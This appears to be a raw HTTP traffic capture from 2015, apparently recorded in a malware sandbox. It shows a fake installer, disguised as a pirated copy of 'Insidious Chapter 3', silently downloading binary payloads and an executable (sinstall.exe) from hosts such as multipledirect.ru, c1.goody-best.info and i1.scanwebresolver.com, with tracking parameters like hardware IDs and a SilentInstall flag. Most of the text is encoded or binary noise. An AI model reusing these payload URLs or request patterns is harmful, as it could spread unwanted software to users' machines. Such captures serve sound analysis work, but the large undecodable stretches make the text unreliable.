..V.M.g.8.9.J.3./.h.4.F.q.H.i.H.W.Y.S.5.7.B.z.6.1.W.M.b.O.J.u.n.6.t.F.w.S.V.F.c.R.Y.k.G.g.n.Z.w.s.0.R.Q.x.m.z.E.o.s.8./.q.n.g.M.T.z.j.4.j.C.v.l.R.6.f.u.y.A.r.D.d.K.u.A.I.z.Z.d.v.A.p.M.u.o.Q.t.d.b. .f.u.U.R.J.q.5.8.m.7.K.0.3.O.n.t.k. .T.9.H.9.8.N.T.7.Z. ./.9.A.p.M.S.u.z.q.E.n.t.N.W.U.V.5.b.W.z.q.a.v.q.x.K.Y.K.e.s./.i.b.C.K.d.M.y.i.B.3.P.I.I.z./.W.W.i.O.D.D.u.B.I.M.1.s.q.h.G.j.i.i. .z.e.r.R.x.h.j.T.W.E.E.E.b.5.s.m.5.E.d.G.A.Y.7.S.S.2.E.5.b.Q.p./.L.i.R.r.d.q.8.7.h.8.i.H.P.Y.c.t.f.C.b.T.7.d.P.n.k.9.l.n.T.8.5.2.L.M.Y.T.c.7.8.N.N.m.h.3.Y.w.9.i.v.U.M.6.r.i.S.6.u.K.D.D.R.6.h.w.j.L.v.6.j.l.o. .C.F.R.c.o.C.7.E.W.8.1.3.l.O.C.6.8.V.a.N.K.q.X.C.u.f.B.g.9.X.m.u.O.V.V.m.S.R.X.a.M.T.f.A.l.d./.t.7.L.S.o.F.S.T.1.j.H.P.k.P.v.5.T.c.t.Y.q.D.9.p.e.k.y./.n.r.v.T.w.c.j.7.J.0.d.c.s.D.i.x.3.l.i.n.a./.x.E.G.T.z.8.Z. .o.n.I.k.A.k.P.7.4.x.n.G.S.Q.g.g.9.C.8.i.r.i.p.Q. .0.3.3.M.6.J.N.g.J.Z.N.f.w.y.N.D.J.b.w./.p.j.x.E.t.H.X.7.c./.X.7.T.H.3.t.w.o.v.s.E.q.6.8.Q.6.j.1.E.O.i.q.D.T.A.J.L.q.d.a.8.K.S.B.l.0.e.n.D.M.0.t.E.i.A.6.W.U.O.i.8.R.l.P.L.5.x.2.D.Q.a.j.C.T.i.1.V.X.E.Z.p.0.X.s.7.K.P.a.0.j.q.Y.u.Q.G.I.F.U.G.y.5.d.g.o.J.z.L.r.O.q.2.7.s.X.f.8.Q.z.m.c.P.8.t.4.G.F.A.7.K.e.N.5.j.4.E.s.G.7.E.A.W.A.m.x.n.b.S.M.u.x.5.k.1.f.L. .k.S./.Q.M.i.t.z.w. .f.R.2.K.r.i.X.A.z.D.E.S.r.X.e.J.F.U.u.D.A.o.K.m.7.X./.S.v.I.H.B.q.N.V.B.J.g.r.s. .S.s.A.U.a.x.M.p.R.3.E. .8.M.1.M.M.2.x.r.W.l.Y.A.J.L.1.9.U.b. .v.c.K.m.p.X.c.K.s.H.V.n.o.Z.5.7.V.O.f.M./.c.J.6.O.A.2.5.H.3.S.o.7.d.X.l.3.o.r.H.w.I.X.h.O.N.5.L.l.r.I.t.e.5.I.D.t.A.O.O.0.y.Y.Z.3.D.b.D.p.A.r.b.u.2./.k.u.s.Y.B.C.Y.l.4.
<<< skipped >>>
GET /?e=eghjkt&cht=2&dcu=1&cpatch=2&dcs=1&pf=1&clsb=1&publisher=24379&&country=UA&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:21 GMT
Content-Type: application/octet-stream
Content-Length: 2275179
Connection: close
Content-Disposition: attachment; filename="g7CyPVZagCsRV8.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.g."..g.......}.......G...G.........=..".....v.....9...#3..y#..M...A..ty..es..H.......'..wf..g...^...O..5<..?r..A..HE..:/..o\.M....F..5w..-$..G...Y..@}..kq.....S....C..;~..hb..F...V..9*..5(.....VN..?l.." ..^...I...r..q1..=......^F..7d..*(.TV...A..*z..i9.GE......f~../|..R..\N...y.."b..<......P...2e..0i.........=`..&$.BZ..@...m?..9f..U..XM..Ig..$y..`......CV..s*..*c..[......#f..=v.\Y......{]..k2..R...C...0.. ~..5..TQ.._]..$$..~f..W...J..tv..:a..J......ge..(=......O...r..|n..2...B......)<..q1.BR...P..6<..*-..]...F..}%..1$.....JJ...h..>$.."...U...N..hr..h'.M....Q..,}..`e......\..28...3.....A....r..9c..!..]K...U..tq...}._v..O...6w..'j......Z..)j..-4..A......Zz..3x.....XR...E..&~..zb.....\...>a..<m.........9l.."(..^..\...Q;..%b..)..\Q..M[.. e..da.....OI......&g..W......'j..9z..]..KQ.. (..jj..#...^..HB..}k..0u......X..%8..}5.F^...\..20...!..Y...B..A!..- ..t..NV...T..:8..&)..Q...J..$v..d#.I....]..(q..di......X...<..27..g..E....N..=...%,.QO...Q..xu..*?.P...]...)v..%g..]..YW...i..pm..{..Sr..C...:s.. n......V..-f..)8.GE..DN..?l.." ..J..Py..Bo..|b..b......T...0t..hv.E...J...e6..j(.L.......l%..5*......D...,..#o..,..VB..HA..vs..hq.E...J...e6..j(.A...N...a:..n$.....A...Y(..`I..r..Lu..[...n#..x=.I...^a..i'..a;.I...Y...t)..`9.....\h..Bl..r ..}..._..>...!b..%1.Z@..D\..z`..di.A..._...$)..e6.....@...L,...=..h..F...H...}*..q,.@.......p%..|0.N...[...r ..~7.....\...I&..~8..r......Z...f%..l0.O....e..b<..y6.P...Tm..u4..q*.....A....>..`1..'.......A..:!..u0.F.......t"..w,.L...N...f0..`:.....Y...Q!..b=.
<<< skipped >>>
GET /?e=ytr&cht=2&dd=19&clsb=1&publisher=24379&country=UA&prv=bestadblocker&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:38 GMT
Content-Type: application/octet-stream
Content-Length: 2252297
Connection: close
Content-Disposition: attachment; filename="dB1XJloRgbF4Qw.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z..^"..1..............0@..0@......0..Q=]".....[,.......*.1...............G.....-.>.(.b.?.:.6.4.*...'...(. .0.".M.P...\.R.~._.a.@.H.X.O.U.C.[.D.z.V.w.I.x.p.`.x.w.a.y.'...>.j.m..............\...U...........Y...=.r.".c.?.1.=.~. .8.&.s.>.'.6...S.].^...X.@.^.o.K...o.a.U.E.N.u.w.o.{.t.d.].a.q.b...X.x.t.9.y.8M.J.C.T.5.1.E.@.B.^.].\.&.$.&.%.o. .Q.7.#.9...4.r...,.:.5.k.'.z.t.h.h._.@.G.o.T.F.Y.Y.M.W.I.@.U.p.n.c.<.R.v.`.u.B.8.'. .r.l.p.`..!...G.*.......^....... .%.8.....?.9...?.%.1.7...>.%. .!.(...n...a.P.S.g.r...8.u.M._.N.e.........&.*...(.w.u.*. .m.4.k.<.7.6...n................M...........X.../.2.>.<.2...}.?.!.9.'.r.?.&.7...R.\._...Y.[.G.].p.H...G.I.Q.O.D.1.s.u.m.{.....D.f.~.j.e...k.l.S..\.v.......0...M.\.].Z.X.D.'.....,...7.e...$.p...!.9.>.).#.f.'.4.Z.P.Y.]...p.A.\.W.M.O...C.P.F.L.}.y.8.H.t.}.z.b.,...x.l.e.M.?.{K.O.L.A.Z.7.7.G.^.@.X._.R.$.".$...m.&.S...<. .0.#.?.A.:...=.a.).L.J.W...X.E.V.T.V._.F._...M...S.h.x.;.}.:.{.3...`.i.y.o.u.q.f.t........X.....R.........H......... .9.z.-.".&.!.1.:.l.&.).#.'. . ...Y...Q...F.W...A.O.G.D.R...J...p.r.n.t.6.f.q.c...b.*.f.r.h.".n_.........U.......M.........C...<.}.2.5.$.#.s.>.o."...i./.).c.....U.K.V.[.[...r.F.F...f...J.L.M.?.s.u.m.{.5.}.1.j.y.y.).h.w.`.l......Z.....T.1.....N...H.....B...~.2.4.,.:.t. .3.=.b.@.!.5.6...(.J.....M.C.[.F.Q.H.O.E...H.K.W.I.m.}.v.'. .u.'.w.K...\.e...q.A.Q......3.'.0...?..._.....V.)... .o...~.......0.>...7.....>.p... .{.n...h.R.g.K.C.e.U.F.P.h...a.e.x.^.(.}.b.`.#.".h.>.:.H.^. .A.3..0.>.0.....>.....Z...%...".
<<< skipped >>>
GET /?step_id=6_1_4&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:53 GMT
Content-Type: text/html
Content-Length: 10306
Connection: close
Content-Disposition: attachment; filename="6_1_4.txt"
..T.s.s.1.J.p.n.g.s.B.Y.B.W.W.f.S.U.M./.P.U.r.B.l.k.q.D.G.V.Y.E.j.3.w.C.3.f.z.O.l.3.7.V.k.b.9.8.z.s.t.i.0.R.j.q.R.y.1.y.t.B.9.f.Q.S.w.k.f.H.x.g.8.V.k.U.L.R.H.I.j.1.J.g.n.B.u.D.n.W.v.h.T.R.g.N.d.g.F.Q.C.h.s.S.7.F.8.3.9.r.o.u.8.L.s.B.K.G.e.C.U.a.j.U.H./.v.R.l.D.M.V.g.0.4.1.K.Y.i.N.k.L.v.3.J.j.T.3.l.6.o.J.S.6.M.D.N.e./.O.N.t.j.W.0.p.j.3.v.Q.v.c.n.J.8.p.U.p.0.I.H.6.G.L.g.h.G.r.C.9.s.x.f.5./.d.Y.h.g.y.L.E.U.S.R.W.1.i.o.E.S.6.X.2./.r.z.a.K.w.Y.q.7.R.I.r.q.M.a. .Z.O.2.c.2.G.y.B.5.k.L.I./.r.q.R.2./.9.o.m.C.d.c.i.o.G.R.R.w.h.i.g.A.M.x.Q.2.6.A.p.n.2.R.g.H.m.R.C.u.k.r.F.6.y.M.F.Q.5.Y.A.F.i.V.7.Z.0.g.3.O.G. .n.j.M.p.6.D./.i.D.X.N.C.j.L.K.5.m.B.U.X.e.X.C.E.w.Y.L.S.m.h.5.y.b.A.u.s.w.a.0.N.M.F.r.F.0.z.C.b.T.Q.B.X.9.M.I.b.t.M.O.1.7.O.l.D.P.Q.Z.q.9.u.5.F.f.f.q.b.e.D.2.d.u.T.I.Y.q.j.c.W.z.g.r.3.B.x.X.q.O.M.b.b.M.6.9.V.U.0.1.G.q.s.u.P.Y.c.E.v.k.i.r.y.L.y./.I.N.y.x.J.x.v.M.Y.U.E.A.N./.4.w.q.9.A.J.Y.2.7.J.v.Q.1.Q.d.Y.5.m.C.v.d.2.N.i.U.n. .9.3. .l.8.y.m.z.s.x.t.K.o.D.2.l.n.G.i. .w.Q.I.W.X.z.F.0.z.1./.Y.A.p.c.P.n.2.z.a.g.F.5.t.t.Z.g.o.r.H.5.V.G.U.H.m.q.W.l.7.B.n.D.B.8.F.b.N.C.E.m.e.c.w.l.5.A.X.R.Y.1.Q.2.6. .W.M.P.9.q.u.U.k.5.e.9.X.u.e.w.E.0.G.F.E. .E.Y.7.j.b.A.D./.5.s.g.h.R.d.g.u.m.o.9.u.8.G.5.x.z.n.h.D.4.S.O.U.1.q.e.k.0.A.w.W.j.n.P.o.D.s.Y.U.Y.l.Z.t.H.p.W.1.5.I.G.R.Z.s.S.y.b.d.7.O.q.9.p.F.y.n.q.P.W.p.T.i.z.o.5.H.t.s. .i.D.E.2.y.v.a.1.W.W.q.H.N.Y.J./.Y.f. .t.d.u.y.f.g.c.q.y.V.n.O.k.p.L.S.V./.3.q.A.v.K.Z.s.7.C.R.Z.v.C.U.o.d.E.2.f.z.j.U.R./.Z.R.n.p.l.0.l.b.E.T.I.0.W.B.V.t.d.n.6.H.2.0. .Q.8.V.N.X.R.7.y.E./.J.C.p.E.W.N.Y./.L.V.u.T.U.y.j.
<<< skipped >>>
GET /?step_id=6&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:08 GMT
Content-Type: text/html
Content-Length: 31266
Connection: close
Content-Disposition: attachment; filename="6.txt"
..7.3.8.R.2.X.Z.R.1.u.D.u.2.T.h.O.Q.I.6.p.r.j.W.j.6.3.n.l.F.W.r.v.S.Z.0. .9.J.b.N.g.L.q.a.8.v.k.r.I.3.N.e.O.x.B.Y.c./.A.5.e.k.2.M.Z.O.x.D.1.y.d.K.N.w.A.7.S.N.1.S.h.W.P.B.g.k. .2.0.h.K.Q.K.O.9.m.P.y.u.C.v.7.C.1.O.0.Z.W.7.s.D.i.6.h.a.N.A. .d.9.J.b.r.Z. .v.L.3.N.J.Q.x.N.j.S.b.O.o.l./.p.R.F.P.C.h.W.Q.4. .w.z.U.a.Q.Y.b.y.k.x.h.T.y.L.8.Q.y.d.P./.r.o.B.7.N.t.t.c.I.7.8.U./.u.K.L.d.C.9.j.D.F.i.G.5.N.u.U.V.n.H.s.Q.2.H.j.7.1.D.j./.9.c.w.r.k. .F.n.m.u.6.7.t.8.H.5.o.S.7.D.V.h.I.Y.4.F.E.Z.8.0.N.a.A.f.Y.U.u.z.M.l.n.g.E.y.9.k.E.8.q.p.I.d.8. .Y.e.e.2.W.v.I.Z.m.h.l.A. .N.F.m.Z.7.g.K.3.b.u.K.V.V.s.k.j.7.Y.y.m.U.y.I.C.u.v.M.t.x.j.P.Y.0.b.x.M.q.4.4.P.o.B.0.6.I.2.M.q.2.9.z.N.V.B.w.Y.B.O.B./.F.s.q.M.B.G.e.V.x.p.p.M.O.5.m.U.A.M.x.x.9.o.s.0.a.9.n.g.6.j.t.t.R./.Q.J.O.y.3.p.X.4.d.i.M.a.K.3.7.Y.S.u.L.K.F.B.z.o.5.I.p.6.6.6.3.0.Q.r.B.A.y.I.q.r.j./.a.E.z.S.4.P.5.5.8.Q. .Y.v.v.n.N.I.l.8.b.R.D.V.r.8.f.z.p.I.V.J.y.E.B.k.O.2.u.2.8.w.1.i.R.w.G.O.0.7.O.L.F.o.u.F.E.u.r.c.z.6.E.0.i.u.y.R.5.D.O.k.8.O.i.m.N.l.M.5.D.6.u.T.I.M.d.6.H.1.L.7.i.S.e./.T.M.V.O.5.6.e.e.2.y.j.4.w.L.r.Q.Y.f.x.q.V.l.s.T.I.O.n.I.a.C.L.0.t.Q.x.r.A.u.7.c.p.k.1.I.u.3.3.J.u.n.1.6.q.t.M.l.k.5.i.4.a.M.6.c.p.U.Y.8.h.7.R.s.R.J.Y.g.h.U.I. .X./.w.f.H.K.a.O.r.m.R./.o.y.0.j.X.6.S.K.9.W.0.V.0.I.8.Y.R.f.E.f.W.q.L.S.6.l.b.n.N.B.7.r.r.r.9.I.4.3.x.f.p.R.K.Z.D.x.X.C.C.Z.c.E.N.c.J.U.C.T.6.H.E.e.1.s.B.R.J.O.A.2.e.D.8.E.u.2.n.y.T.X.p.y.w.e.F.J.t.j.4.E.r.4.J.G.3.j.e.G.n.H.K.8.G.A.G.L.c.D.G.C.H.A.l.x.8.d.H.f.Q.L.o.C.a.P.n.m.R.7.e.4.5.V.a.T.h.w. .w.n.F.L.D.D.V.m.W.H.n.h.T.Z.Y.8.I.U.w.0.2.i.T.x.r.Q.S.U.z.
<<< skipped >>>
GET /?step_id=6_2&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:54:01 GMT
Content-Type: text/html
Content-Length: 8236
Connection: close
Content-Disposition: attachment; filename="6_2.txt"
..t.Q.p.4.H.k.g.B.4.Z.N.N.v.w.P.F.H.w.D.j.Q.d.h. .M.7.q.P.8.r.V.x.S.o.v.M.T.N.Z.y.2.5.Y.E.q.L.P.I.S.7.d.F.N.r.l.G.i.G.n.R.q.N.g.u.K.Z.2.1.a.M.h.f.d.U.i.u.8.U.z.U.B.n.X.H.n.8. .d.7.r.H.O.y.I.N.Y.b.U.h.5.W.y.O.O.T.w.D.E.Y.B.P.5.1.b.9.T.R.V.6.g.3.I.x.r.L./.C. .m.1.5.7.i.T.x. .6.A.i.N.u.P.L.i.z.R.W.d.E.t.V.H.5.R.W.7.I.z.3.H.L.z. .o.C.v.Z.N.G.D.Z.9.e.a.k.C.p.x.a.C.5.q.z.p.e.C.Z.5.c.0.C.S. .p.I./.z.Z.Z.F.R.n.F.F.g.V.t.R.I.f.q.V.j.U.O.4.V.t.v.H.K.W.z.Q.1.Z.8.m./.1.q.J.G.G.3.S.Y.X.s.E.g.6.g.E.R.S.G.9.4.N.d./.K.1.u.x.w.n.E.A.I.O.3.w.B.W.Y.a.8.T./.R.l.G.v.D./.1.S.f.M.S.A.B.l.M.u.k.m.M.a.5.c.k.g.p.m.u.P.Y.q.a.g.6.N.3.V.S.c.C.b.4.2.E.k.4.l.Y.X.p.p.o.I.r.i.w.H. .D. .I.R.O.T.T.x.m.T.8.4.C.N.t.2.V.3.I.W.Z.j.G.A.3.L.D.7.n.Y.X.5.i.m.T.L.O.U.I.E.t.9.p./.e.X.u.R.P./.N.X.g.N.h.H.Z.j.u.5.K.z. .y.V.6.y.P.K.G.v.w.9.h.2.6.v.j.0.x.P.k.H.v./.t.A.l.m.i.w.t.U.a.F.h.k.H.a.l.W.T.s.z.f.z.c.i.n.9.S.6.U.0.7.2.g.4.c.E.f.3.O.e.2.d.K.a.U.z.N.r.4.e./.8.T.W.s.8.c.T.D.M.o.V.D.r.8.X.T.3.0.0.P.C.3.G.n.C.o. .n.t.z.i.H.i.2.6.j.h.D.8.X.u.X.B.c.p.V.a.m./.i.V.g.X.5.7.G.0.q.G.f.C.6.X.a.e.o.q.E.h.w.i. .v.B.Z. .z.G.m.4.w.Y.Q.D.A.R.2.N.Y.H.w.k.L.z.G.x.k.i./.F.e.h.A.V.i.U.M.w.y.1.u.4.e.h.C.G.I.r.W.Q.I.0.J.U.P.8.h.E.M.F.X.5.v.4.l.U.2.B.X.Y.9.x./.G.9.1.b.t.U.2.A.b.u.r.u.v.k.Q.Q. .y.F.t.G.d.E.D.l.N.G.x.8.J.D.7.S.L.Y.a.U.O. .Z.h.T.J.c.c.k.E. .0.0.r.a.l.I.T.d.9.A.S.R.2.h.n.V.Q.6.K.i.e.5.O.C.Y.V.G.o.Q.4.f.9.l.A.b.M.A.V.c.2.p.0.9.d.7.F.4.n.s.A.B.w.q.4.z.A.3.7.Q.m.P.A.6.i.C.d.K.8./.C.w.y.O.I.4.e.Y.I.x.2.K.4.h.Q.j.p.d.u.R.y.C.P.X.E.Q.g.d.Z.6.8.F.X.n.L.U.r.q.G.l.1.h.s.w.
<<< skipped >>>
GET /?step_id=6_2_1&sf=1&installer_id=2249414903470210647&publisher_id=24379&source_id=0&page_id=0&affiliate_id=0&country_code=UA&locale=EN&browser_id=4&download_id=2225208770382696055&external_id=0&tag_id=0&installer_type=IX_2013&hardware_id=8738532578695851691&session_id=16580608941307095478&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&q=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&product_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&installer_file_name=Insidious Chapter 3 2015 HC HDRip XViD-ETRG&jxbo=1&ttl=1434669534790&self_redirect=0&project_encode_id=24379&enc_u_p=1&enc_u_p=1&enc_u_p=1&st=0&st=0&AddToPayLoad=RunOnceMutex="alpha_installer" RunOnceMutexDuration="0" SilentInstall="~=1,1,0)>"&filesize=&sr=1&iid=2249414903470210647&did=2225208770382696055&installer_only=1&st=0&uuid=%2A HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: c1.goody-best.info
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:55:12 GMT
Content-Type: text/html
Content-Length: 4214
Connection: close
Content-Disposition: attachment; filename="6_2_1.txt"
..1.Q.v.c.E.m.j.2.W.v.j.x.2.w.t.8.9./.j.7.c.g.C.X.d.x.d.E.5.u.r.N.2.3.u.5.P.t.Q.u.4.i./.M.S.M.P.9.3.n.m.4.M.H.f.T.g.n.S.k.c.X.Z.1.1.9.0.o.N.P.i.H.d.B.K.2.X.M.e.6.y.a.R.A.O.E.5.T.u.Z./.4.V.B.J.O.S.X.d.H.4.4.p.T.A.2.y.B.j.n.a.5.s.y.f.B.b.Q.S.k.P.5.u.h.U.x.6.P.T.m.i.z.J.6.C.U.Q.l.T.W.T.Y.E.p.t.O.x./.2.Q.L.b.w.T.v.K.l.z.x.y.C./.J.i.D.u.m.N.w.D.l.M.6.L.b.G.K.V.8.2.C.w.R.7.E.E.j.8.v.a.k.a.0.H.n.Z.U.F.d.M. .o.u.g.C.8.4.k.I.k.v.P.U.c.e.6.C.7.H. .x.9.w.J.7.o.z.L.b.G. .c.9.u.5.M.T.g.Q.b.Q.5.3./.Y.q.O.6.n.2.s.H.3.s.T.u.K.V.F.N.1.p.b.x.Y.8.H.o.G.5.Q.T.W.R.M.C.F.N.8.6.d.Y.Z.k.n.2.I.E.E.I.z.I.L.v.l.z.W.P.A.Q.i.k.3.u.b.Y.X./.N.J.F.O.v.Q.W.n.i.q.v.n.n.5.e.L.O.Z.7.o.a.c.p.I.f.X.4.6.N.d.e.7.l.Q.Y.U.L.R.y.K.u.s.Z.M.f.U.i.n.U.t.c.D.a.Q.q.D.v.n.l.P.E.q.M.r.O.h.W.7.8.C.Z.w.g.9.x.X.h.o.D.Q.h.S.8.9.3.O.s.i.x.p.x.2.8.M.W./.5.g.2.q.8.r.A.w.4./.l.C.V.t.2.f.O.f.n.a.u.V.N.B.h.g.B.K.A.g. ./.i.P.A.0.k.U.g.9.u.Q.A.p.V.8.S.z.T.K.c.Y.C.6.n.4.K.K.M.G.Q.X.7.E.a.c.i.7.F.E.7.Z.p.L.H.I.w.x.8.I.w.Q.m.s.C.e.Z.n.9.U.U.r.R.q.L.v.K.z.A.h.b.q.1.j. .X.u.G.3.5.R.U.L.w.r.3.t.k.z.h.C.9.P.Y.K.P.Z.V.H.z.D.k.a.A.z.d.A.v.Q.H.T.R.i.i.g.t.O.f.p.F.0.z.5.G.R.k.5.d.7.f.v./. .J.I.g.9.L.N.R.j.k.W./.o.d.t.9.9.C.i.C.6.t.I.X.5.C.J.A.K.2.7.N.D.I.r.q.d.F.1.U.w.1.9.s.B.9.O.v.Z.s.u.q.G.F.7.7.6.0.O.W.O.j.4.J.M.V.j.y.4.A.V.i.a.K.R.P.u.H.R.e.F.w.6.0.O.B.F.L.R.V.M.6.G.m.W.E.A.Z./.j.6.P.h.4.S.P.A.8.8.N.W.2.I.s.F.q.t.y.1.B.z.q./.K.e.U.r.X.g.f. .4.6.w.d.p.U.l.7.8.f.G.U. .f.d./.B.k.h.x.X.Y.7.B.S.0.l.a.t.J.a.O.9.H.1.h.a.b.u.D.E.C.W.M.q.i.I.y.A.w./.U.5. .A.Z.0.k.b.V.K.0.g.V.z.D.p.Q.M.A.
<<< skipped >>>
GET /?e=bsp&clsb=1&publisher=24379&country=UA&dd=5&cid=334&vn=158&ind=2249414903470210647&exid=0&ssd=16580608941307095478&hid=8738532578695851691&osid=501&channel=0&sfx=2&ne=1&jc=1&mb=1&install_date=20140701&cha=0 HTTP/1.1
Range: bytes=0-
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Host: multipledirect.ru
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: ngx_openresty
Date: Wed, 01 Jul 2015 04:53:55 GMT
Content-Type: application/octet-stream
Content-Length: 524274
Connection: close
Content-Disposition: attachment; filename="fyBYRfMAYKA66R.ca"
Content-Transfer-Encoding: binary
Access-Control-Allow-Origin: *
..z.....B{...............H...H......D.=.........v#..o}..-)..!........M..jU..K...l..6...,>..:...9Z..H...A.......L..q4..D2..iz..%....J...4.......Y.7...(g..>s..@{..JF..NZ...V...[.9e..}$..y=..Pv..[...]...x...EV..y..<j.."w..L...QB..CX...R...T.....>d.. i..Nq..O|..bW...L...Q..fY. ...=n..xc.. ~...H...K..G...S..(...!1..d'..8...RY...;...H...V..v..<j..,|..!...<....O..tW..dZ..o..#|..xi..Ao..&|...J...I..A...U..*...#7..f!..:.......NY...V...[.7...*'..<u..?`..N...G.......J...2..Nu..5-..em..$B...D...*...=.....3...."..6z..,........I..nQ..p..v!..-...5n..6{...^..D...]......{0..}8..Xx..ev...8...........@..b..h~..4r..:...DG.._O..FI...Z.....3... *..3'..;d..CD..HY...T...R.w}..l9..f=..2.......^....<.....'7../p..2~..-....=...F...U..M...)......' ..b-..>(......OE...Z.....C...6l..6z..*..............._..m*..&>..`1..h2.......K..hS..P^.'.../p..2~../........M..jU..]...l..?...<|..&...<U...=......U...P..(4..~ ..f8..",...A..vI..RN...<.Xc..zk..}b.. {...H...6.......P.xt..2h..2~../....!...)...H..Q...g..\o..=b..1...9Z...D...*...O.....#|..b-..{8..0,..V...^........Y.2...(6..5>..=f...H...K..G...S..(...!1..d'..8.......G_..V...L...h..ta..k$..xx..l[.......J..RZ..s..> ..o:..z~..nw..A...BN.......Y.5...-6..>s..@{..K....%...N...P.bw..2h..<u..B}..p3...-...H...V..y..<j.."w..L...p....9......U...P..(4..~ ..f8..",...A...T..Z...S..Jh..q>..g&..R`.._H...6...5.....Ze..|m..jb.."x...N...0.......].....$...):..,>..}...H@..\Y..S...P.. 4.. i..3l..r=..K.......F...N..J8..w`..'...=3.......V..SV..WE.:$..k>..~z..js..E
<<< skipped >>>
HEAD /addons/sinstall.exe HTTP/1.1
Accept: */*
Accept-Encoding: identity
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/535.7 (KHTML, like Gecko) Chrome/16.0.912.75 Safari/535.7
Pragma: no-cache
Expect: 100-continue
Host: i1.scanwebresolver.com
Connection: Keep-Alive
HTTP/1.1 100 ContinueHTTP/1.1 200 OK..Server: openresty..Date: Wed, 01 Jul 2015 04:55:14 GMT..Content-Type: application/octet-stream..Content-Length: 1085440..Last-Modified: Wed, 04 Feb 2015 13:58:06 GMT..Connection: close..ETag: "54d2256e-109000"..Accept-Ranges: bytes..
